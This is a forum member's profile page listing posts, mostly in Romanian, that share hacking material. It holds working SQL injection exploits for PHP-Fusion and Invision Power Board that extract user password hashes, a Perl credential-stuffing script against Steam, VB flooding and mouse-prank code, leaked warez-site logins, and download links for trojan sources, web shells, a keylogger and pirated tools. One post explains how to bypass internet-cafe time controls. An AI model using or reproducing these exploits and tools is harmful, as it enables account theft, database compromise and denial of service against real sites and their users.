Jump to content

Proxenon

Members
  • Posts

    43
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Proxenon's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Proxenon

    Conturi

    http://www.fulldownloads.us Username: Af872HskL Password: XjsdH28N http://www.warezquality.com Username: ageg2020 Password: z8fsDfg3 http://www.dollarwarez.com Username: YR8JBz Password: DxAVC2 Aceste conturi le puteti gasi cu un simplu search pe google P.S:nu am stiut unde sa le postez
  2. Download: http://www.netdrive.ws/46770.html
  3. Vom avea nevoie de 3 API-uri : Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long Private Declare Function SwapMouseButton Lib "user32" Alias "SwapMouseButton" (ByVal bSwap As Long) As Long Cu functia SetCursorPos vom seta pozitia cursorului . Functia are 2 argumente : x si y , adica locatia in care sa setam curorul . Freeze mouse : setam pozitia cursorului in acelasi loc , cu ajutorul unui timer ( interval 1 ) : Private Sub Timer1_Timer() x = SetCursorPos(300, 500) ' La intamplare 300 , 500 End Sub Crazy Mouse : Setam pozitia mouse-ului aleator pe ecran cu ajutorul unui timer ( interval 10 de ex ) : Private Sub Timer1_Timer() x = SetCursorPos(Rnd * 1000, Rnd * 1000) ' Setam pozitia cursorului ca un nr aleator intre 0 si 1000 . End Sub Pentru a opri Freeze mouse si crazy mouse , oprim timerul . Hide Mouse - Vom folosi al doilea API : ShowCursor , care are nevoie decat de un argument : bShow . Daca bShow e 1 , cursorul va fi vizibil , daca e 0 va fi ascuns . Private Sub Command1_Click() ShowCursor 0 ' Ascundem cursorul End Sub Pentru a afisa din nou cursorul : ShowCursor 1 Pentru Swap Mouse Button vom foloi al 3-lea API : SwapMouseButton , care la fel ca ShowCursor , are un singur argument : bSwap , care daca va fi 1 , butoanele mouseului vor fi inversate si daca va fi 0 se va reveni la normal . Private Sub Command1_Click() SwapMouseButton 1 ' Pentru inversare End Sub Private Sub Command2_Click() SwapMouseButton 0 ' Pentru revenire la normal End Sub
  4. Pentru a creea un mic sau mare port fucker in Visual Basic 6 Vom Avea nevoie de : - 2 Textboxuri (ip.text si port.text) - 2 Butoane (cmdStart si cmdStop) - Control Microsoft Winsock Control 6.0 (mswinsck.ocx Project -> Components) - 5 (Sau mai multe Winsockuri pe Forma) - 1 Timer pus pe intervalul 1 (Numele lui sa fie action) si care sa fie disabled In Urmatorul Exemplu vom folosi numai 5 Winsockuri (sock1 , sock2 , sock3 , sock4 , sock5) Codul butonului De Start : Cod: action.enabled = true Codul Butonului de Stop : Cod: action.enabled = false Codul Timerului Action : Cod: For i = 0 to 150 'Reconnecteaza de 150 de ori Winsockuriile 'Sock 1 sock1.close sock1.RemoteHost = ip.text sock1.RemotePort = port.text sock1.Connect sock1.close Cod: 'Sock 2 sock2.close sock2.RemoteHost = ip.text sock2.RemotePort = port.text sock2.Connect sock2.close Cod: 'Sock 3 sock3.close sock3.RemoteHost = ip.text sock3.RemotePort = port.text sock3.Connect sock3.close Cod: 'Sock 4 sock4.close sock4.RemoteHost = ip.text sock4.RemotePort = port.text sock4.Connect sock4.close Cod: 'Sock 5 sock5.close sock5.RemoteHost = ip.text sock5.RemotePort = port.text sock5.Connect sock5.close next i
  5. [VB]bLACKdREAM [VB]derSphear [VB]Evoloution [VB]Monk1.0 [VB]Omega1.1 [Vb]Sect [Vb]SennaspyAutoTrojan [VB]stealth eye [VB]simplu [VB]Remote_Admin [VB]pzza cod [VB]pasword crack [VB]Organising182384112001 [VB]minimo [VB]Messiah 2.0 [Private] [VB]Handle-X [VB]FearRAT [VB]Controla Machine [VB]CommandCenter [VB]ClientServerciccio [VB]Black Dream [VB]Basic Trojan Horse [VB]Ullysse http://rapidshare.com/files/54745473/surse_cod.rar
  6. CrackersKit 2005 Golden eye 2005 HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Ascii Factory 0.6 Cool Beans NFO Creator v2.0.1.3 Dizzy v1.10 Feuer's NFO File Maker v2.0 Ims NFO&DIZ Maker 1.87 Inserter v1.12 NFO Creator v3.5.2 NFO Maker 1.0 Patchs All In One 2005 SoftIce 4.05 -Win 2000-XP IP Address Scanner IP Calculator IP Converter Port Listener Port Scanner April 2005 Ping NetStat 2005 Cool Trace Route 2005 TCP/IP Configuration Online - Offline Checker Resolve Host & IP Time Sync Whois & MX Lookup Connect0r Connection Analysator and prtotector Net Sender April 2005 E-mail seeker Cool Net Pager Active and Passive port scanner Spoofer Hack Trapper HTTP flooder (DoS) Mass Website Visiter Advanced Port Scanner Trojan Hunter Multi IP April 2005 Port Connecter Tool Advanced Spoofer Cool Advanced Anonymous E-mailer April 2005 Simple Anonymous E-mailer Anonymous E-mailer with Attachment Support Mass E-mailer E-mail Bomber E-mail Spoofer Simple Port Scanner (fast) Advanced Netstat Monitoring X Pinger Web Page Scanner Cool Fast Port Scanner Deep Port Scanner Fastest Host Scanner (UDP) Get Header Open Port Scanner Multi Port Scanner HTTP scanner (Open port 80 subnet scanner) Multi Ping for Cisco Routers TCP Packet Sniffer UDP flooder Cool Resolve and Ping Multi IP ping File Dependency Sniffer EXE-joiner Encrypter Advanced Encryption File Difference Engine File Comparasion Mass File Renamer Add Bytes to EXE 5Cool Cool Variable Encryption 59) Simple File Encryption 60) ASCII to Binary Enigma Password Unmasker Credit Card Number Validate and generate Create Local HTTP Server eXtreme UDP Flooder Web Server Scanner Force Reboot Cool Webpage Info Seeker Bouncer Advanced Packet Sniffer IRC server creater Connection Tester Fake Mail Sender Bandwidth Monitor Remote Desktop Protocol Scanner MX Query Messenger Packet Sniffer Cool API Spy DHCP Restart File Merger E-mail Extractor (crawler / harvester bot) Open FTP Scanner Fast Patch Predator's Extreme Loader Generator 0.3 Srlzer - Patch generator Yoda's Process Patcher Buddha Patch File Creator 2.2 CodeFusion Cool Beans NFO Creator 2.0.1 build 3 Patch Creation Wizard v1.2 Patch On The Fly v0.75 Rlzer RTD - WINpatch v1.0 Tola's Patching Engine Analysis : OllyDbg 1.10 W32Dasm 8.93 /w patch PEiD 0.92 Rebuilding : ImpRec 1.6 Revirgin 1.3 LordPE RoyalITS Packers : FSG 2.0 MEW 11 1.2 SE UPX 1.25 Patchers : dUP 1.11 CodeFusion 3.0 Universal Patcher Pro 2.0 aPatch 1.07 (*New) PMaker 1.1.0.0 (*New) Tola's Patch Engine 2.03b (*Nuevo) ABEL Loader 2.31 (*Nuevo) HEX Editor : BView 5.6.2 Decompilers : DeDe 3.50.04 Flasm Unpackers : Alot! ( ASProtect, ACProtect etc ) Others : FileMon RegMon RSATool 2 d*mn HashCalc Krugers ToolBox EVACleaner 2.7 (*New) Process Explorer (*New) Resource Hacker (*New) PUPE 2002 (*New) Download: http://rapidshare.de/files/14784929/simsek206.rar.html Password: www.internetkorsanlari.net.tc
  7. Avetzi aici uneltele de munca a unui hacker ••• sH3ll ••• -Antichat Shell v1.3 -Ayyildiz Tim -AYT- Shell v 2.1 Biz -aZRaiLPhp v1.0 -c100 -CrystalShell v.1 -Cyber Shell (v 1.0) -dC3 Security Crew Shell PRiV8 -Dive Shell 1.0 - Emperor Hacking Team -DxShell.1.0 -ELMALISEKER Backd00r -GFS web-shell ver 3.1.7 - PRiV8 -h4ntu shell [powered by tsoi] -JspWebshell 1.2 -KAdot Universal Shell v0.1.6 -Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit -Macker's Private PHPShell -Mysql interface v1.0 -MySQL Web Interface Version 0.8 -NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version -Perl Web Shell by RST-GHC -Private-i3lue -RedhatC99 [login=redhat-pass=root] -Rootshell.v.1.0 -s72 Shell v1.1 Coding -Safe0ver Shell -Safe Mod Bypass By Evilc0der -Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 -SimAttacker - Vrsion 1.0.0 - priv8 4 My friend -SimShell 1.0 - Simorgh Security MGZ -SnIpEr_SA Shell -WinX Shell -Worse Linux Shell ••• Vuln Scan ••• -GoogleRFI + MassInjector in Perl -MaD-CW XSS & Remote File Inclusion Scanner [Win] -PerlGroup Scanner RFI -REMOTE FILE INCLUDE SCANNER SHELLBOT -RFI Scan created by Ironfist -Scanutil 1.1 by ToRNadO -Shellbot with VulnScan m0d by AdvAnCeD -RFI-SQL scanner -VulnScan v6 + Spread + Defacing Tool v2 -VulnScan v7 -Final- By k1n9k0ng -VulnScan v8 by PcW0rm [iTA by s[H]4g] -VulnScan v9 -XeviL Perl Script 1.0 By ar3s ••• Oth3r t00lz ••• -BUNNY BOT Version 0.1 -ConnectBack Backdoor Shell vs 1.0 by LorD -Flud2Mail (F2M) 0.1 -FTp brute forcer -iMHaBiRLiGi PhpFtp V1.1 -LocalLinuxExploitFinder -Mass Defacer And Log Eraser PRiV8 -Multi-thread FTP scanner v0.2.5 by Inode -NetGaurd FTP Brute Force -PHProxy -RST MySQL tools -scan - K. Script v0.3 Beta By DiVaBoY -Simple FTP brute by ReZEN -S l a v e Z e r o IRC B0t -Stealth ShellBot Vers 0.2 by Thiago X -inDEXER And ReaDer -ZER0CoOLz Mail BomBER link pt download http://rapidshare.com/files/20563603/NiAi-drt.rar parola arhivei e d4rk-r3v-t34m marimea 4.9 mb
  8. Forum Poster 2.7 + Crack Forum Poster allow you to post any message you want to all forum boards. The current version can post to : 1. phpBB Forum Boards from version 2.0.0 to 2.0.22 http://www.phpbb.com/ 2. phpBB 3.0 "Olympus" Beta 5 http://www.phpbb.com/development/ 3. Invision Power Board http://www.invisionboard.com/ 4. Snitz Forums 2000 http://forum.snitz.com/ 5. vBulletin 3 http://www.vbulletin.com/ Forum Poster automatically register a user with the username, e-mail and password you typed on the board. It loggs in as the registered user on the board and then posts it. All made automatically. With just one click! (Please browse our demo boards for posting) Forum Poster support add, edit, delete forums URL, Import and export forum URL list. Forum boards are an effective way to drive traffic to your site. With your posted Ads you can bring hundreds of new visitors to your site and increase your search engine rankings which counts on link popularity like Google. Download: http://rapidshare.com/files/39965827/ForPostR2.rar
  9. Download : http://files.filefront.com/firewall+killer+13rar/;10014551;/fileinfo.html
  10. Ardamax Keylogger is a keystroke recorder that captures user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. download, marime ( 1,2 mb ): http://rapidshare.com/files/90820657/Ardamax.Keylogger.v2.85.rar
  11. Features: 100% recovery rate Resets passwords directly from a bootable USB Drive, no floppy or CD-ROM drive required Resets password for any account Resets local policy settings for any account Displays the detailed information about local user accounts Windows XP Tablet PC Edition is supported Windows Server 2003 is supported Windows Server 2003 R2 is supported Windows XP Home and Professional Editions are supported Windows 2000 Professional, Server and Advanced Server are supported Windows NT Workstation and Server 4.0 are supported Resets Domain Administrator password for Active Directory Domain Controllers (Enterprise Edition only) All secure boot options are supported All Service Packs are supported http://rapidshare.com/files/51797415/WinHackCD_ST_R.rar
  12. #! /usr/bin/perl use LWP::UserAgent; my $ua = LWP::UserAgent->new( agent => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Alexa Toolbar Firefox/2.0.0.6 (Ubuntu-feisty)' ); $ua->default_headers->push_header('Referer' => 'https://steamcommunity.com/'); $ua->default_headers->push_header('Cookie' => 'timezoneOffset=7200,0'); my $url = 'https://steamcommunity.com/'; open(FILE, $ARGV[ 0 ]) or die("Could Not Open File!\n"); my @lines = <FILE>; close(FILE); foreach $userpass (@lines) { $userpass =~ s/^\s+//; $userpass =~ s/\s+$//; unless($userpass =~ m/(.*?)\.*?)(\ |$)/g){next;} my $user = $1; my $pass = $2; retry: print "Trying User: ".$user." \t\tPass: ".$pass."\n"; my $response = $ua->post( $url, { 'action' => 'doLogin', 'goto' => '', 'steamAccountName' => $user, 'steamPassword' => $pass, 'x' => int(rand(100)+750), 'y' => int(rand(10)+390), }); #print $response->content; exit; if($response->code == 302) { print "Logged IN!\n"; open(FILE, '>>', 'steamworking.txt'); print FILE $userpass."\x0D\x0A"; close(FILE); } elsif(($response->is_success) && ($response->content =~ m/Incorrect.*login/gi)) { print "Fail, Next!\n"; next; } else { print "No Match, Retrying!\n"; goto retry; } }
  13. #!/usr/bin/python """ #=================================================================================================# # ____ __________ __ ____ __ # # /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ # # | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ # # | | | \ | |/ \ \___| | /_____/ | || | # # |___|___| /\__| /______ /\___ >__| |___||__| # # \/\______| \/ \/ # #=================================================================================================# # This was a priv8 Exploit # #=================================================================================================# # PHP-Fusion 6.00.307 # # And Probably All Other Versions # # Blind Sql Injection Vulnerability # # Benchmark Method # #====================================#===========#====================================#===========# # Server Configuration Requirements # # Some Information # # #====================================# #====================================# # # # # # magic_quotes_gpc = 0 # Vendor: php-fusion.co.uk # # # Author: The:Paradox # #================================================# Severity: Moderately Critical # # # # # Oh wow no-content space! Enjoy it! # Proud To Be Italian. # # # # #====================================#===========#================================================# # Proof Of Concept / Bug Explanation # # #====================================# # # PHP-Fusion presents a critical vulnerability in submit.php page. Let's see source: # #=================================================================================================# [submit.php] 1. if ($stype == "l") { 2. 3. if (isset($_POST['submit_link'])) { 4. 5. if ($_POST['link_name'] != "" && $_POST['link_url'] != "" && $_POST['link_description'] != "") { 6. $submit_info['link_category'] = stripinput($_POST['link_category']); 7. $submit_info['link_name'] = stripinput($_POST['link_name']); 8. $submit_info['link_url'] = stripinput($_POST['link_url']); 9. $submit_info['link_description'] = stripinput($_POST['link_description']); 10. $result = dbquery("INSERT INTO ".$db_prefix."submissions (submit_type, submit_user, submit_datestamp, submit_criteria) VALUES ('l', '".$userdata['user_id']."', '".time()."', '".serialize($submit_info)."')"); #=================================================================================================# # Look to the sql query. # # There are two variables: $userdata['user_id'] and a serialized array $submit_info. # # The user_id is an intval value and array values link_category, link_name, link_url and # # link_description are correctly cleaned via fusions' stripinput() function. # # # # All seems pretty cleaned. # # But what would happen if we set another value into submit_info[] array via gpc vars? # # It will be set in the serialized array, and obvious it will not checked by stripinput. # # Sql Injection possibility! # # # # Let's see: # # # # Host: 127.0.0.1 # # POST PHP-Fusion/submit.php?stype=l # # link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1 # # # # It will result in sql error in case of Mq = 0 : # # # # You have an error in your SQL syntax; check [...] # # # #=================================================================================================# # Normally to make this trick working register_globals = 1 is needed, but in php-fusion uses # # extract() to simulate register_globals when it is set to 0. # #=================================================================================================# # Use this at your own risk. You are responsible for your own deeds. # #=================================================================================================# # Python Exploit Starts # #=================================================================================================# """ from httplib import HTTPConnection from urllib import urlencode from time import time from sys import exit, argv, stdout from md5 import new print """ #=================================================================# # PHP-Fusion v6.00.307 # # And Probably All Other Versions # # Blind Sql Injection Vulnerability # # Benchmark Method # # # # Discovered By The:Paradox # # # # Usage: # # ./fusiown [Target] [Path] [ValidId] [ValidPass] [TargetUserid] # # # # Example: # # ./fusiown localhost /phpfusion/ 40 s3cr3t 1 # # ./fusiown www.host.org / 791 myp4ssw0rd 1 # #=================================================================# """ if len(argv)<=5: exit() else: print "[.]Exploit Starting." prefix = "fusion_" benchmark = "230000000" vtime = 6 port = 80 target = argv[1] path = argv[2] cuid = argv[3] cpass = argv[4] uid = argv[5] j=1 h4sh = "" ht = [] for k in range(48,58): ht.append(k) for k in range(97,103): ht.append(k) ht.append(0) def calc_md5(p): hash = new() hash.update(p) return hash.hexdigest() print "[.]Blind Sql Injection Starts.\n\nHash:" while j <= 32: for i in ht: if i == 0: exit('[-]Exploit Failed.\n') start = time() conn = HTTPConnection(target,port) inj = "' OR (SELECT IF((ASCII(SUBSTRING(user_password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE user_id=" + uid + "))# BH > WH" conn.request("POST", path + "submit.php?stype=l", urlencode({'link_category': '1', 'link_name': '1', 'link_url': '1', 'link_description': '1', 'submit_link' : 'Submit+Link', 'submit_info[cGd0MQ==]' : inj }), {"Accept": "text/plain", "Content-Type" : "application/x-www-form-urlencoded","Cookie": "fusion_user=" + cuid + "." + calc_md5(cpass) + ";"}) response = conn.getresponse() read = response.read() if response.status == 404: exit('[-]Error 404. Not Found.') now = time() if now - start > vtime: stdout.write(chr(i)) stdout.flush() h4sh += chr(i) j += 1 break; print "\n\n[+]All Done.\n-=Paradox Got This One=-" # milw0rm.com [2008-04-19]
  14. Rated as : Moderated Risk #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; &header(); if (@ARGV < 2) {&info(); exit();} $server = $ARGV[0]; $dir = $ARGV[1]; print "[+] SERVER {$server}\r\n"; print "[+] DIR {$dir}\r\n"; #Step 1, detecting vulnerability print "[1] Testing forum vulnerability..."; $q = "UNION SELECT 'VULN',1,1,1/*"; query($q,$server,$dir); if($rep =~/VULN/){ print "forum vulnerable\r\n"; } else { print "forum unvulnerable\r\n"; &footer(); exit(); } #Step 2, detecting prefix print "[2] Searching prefix..."; $q = ""; query($q,$server,$dir); $prefix = $rep; print $prefix."\r\n"; #Step 3, make query print "[3] Performing query; it may take several minutes, plz, wait...\r\n"; $q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*"; query($q1,$server,$dir); $kol = $rep; open(RES,">".$server."_result.txt"); for($id = 1; $id <= $kol; $id++) { $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if($rep=~/[0-9a-f]{32}/i) { $hash = $rep; $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)==5) { $salt = $rep; $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)>0) { $email = $rep; print RES $id.":".$hash.":".$salt."::".$email."\n"; } } } } close(RES); print "[!] Query was successfully perfomed. Results are in txt files\r\n"; &footer(); $ex = <STDIN>; sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n"; } sub header() { print q( ---------------------------------------------------------- * Invision Power Board 2.1.* Remote SQL Injecton Exploit * * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) * * Coded by w4g.not null * * FOR EDUCATIONAL PURPOSES *ONLY* * ---------------------------------------------------------- ); } sub info() { print q( Usage: perl w4gipb216.pl [server] [/dir/] where |- server - server, where IPB installed without http:// |- /dir/ - dir, where IPB installed or / for no dir e.g perl w4gipb216.pl someserver.com /forum/ Stealing info about users (format id:pass:salt::email) [!] Need MySQL > 4.0 ); } sub query() { my($q,$server,$dir) = @_; $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } else { if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; } } } return $rep; } securitydot.net - 2006-07-19
  15. Buna baieti,sunt sigur ca totii ati fost cel putin o data la un Internet Cafe unde aveati limita la timpul dvs.In acest tutorial voi incerca sa va explic ce trebuie facut pentru a avea timp nelimitat la PC-urile din obisnuitele cluburi de Internet Cafe.Voi incepe cu metoda cea mai simpla si anume:atunci cand responsabilii salii folosesc ScreenSavere pentru a bloca utilizarea PC-ului.Sa incepem: Apasa CTRL+ALT+DEL si inchide procesul. Apoi te vei uita la un desktop gol, fara Start ,fara nimic. Urmatorul lucru : CTRL+ALT+DEL din nou si dute la File>New Task (RUN) Scrie "iexplore.exe" fara ". Finish. Acum poti naviga pe net cat doresti. Wink A doua metoda : Deschide un Notepad, apoi scrie CMD in el,apoi salveaza-l ca un fiser BATCH ,Exemplu: Fisier.bat (Ar fi mai bine ca Notepad-ul si fisierul BATCH sa se afle pe desktop), ruleaza fisierul nou creat (Fisier.bat).Vei vedea o fereastra Command Prompt, scrie "cd\windows" pentru a schimba directorul in Windows,pe urma scrie "regedit" ,navigheaza pana la : Cod: HKEY_CURRENT_USER>Appevents>software>classes> microsoft>windows>current version>internet settings>policies>system Apoi in dreapta vei vedea Disable Taskmanager, click dreapta pe el, scroll cu mouse-ul jos pe modify ( CLICK PE EL ), pune valoarea "0". Deschide Windows Task Manager tinand apasat CTRL+ALT+DEL, dezactiveaza timpul limita (TIMER-UL) Ia te uita ,acum ai timp nelimitat. Acest lucru e posibil,daca responsabilii cu sala / adminii ,sau cum vrei sa-i ziceti, sunt prosti si nu observa ca dvs stati la PC-ul respestiv de 10 ore. Bafta in continuare.
×
×
  • Create New...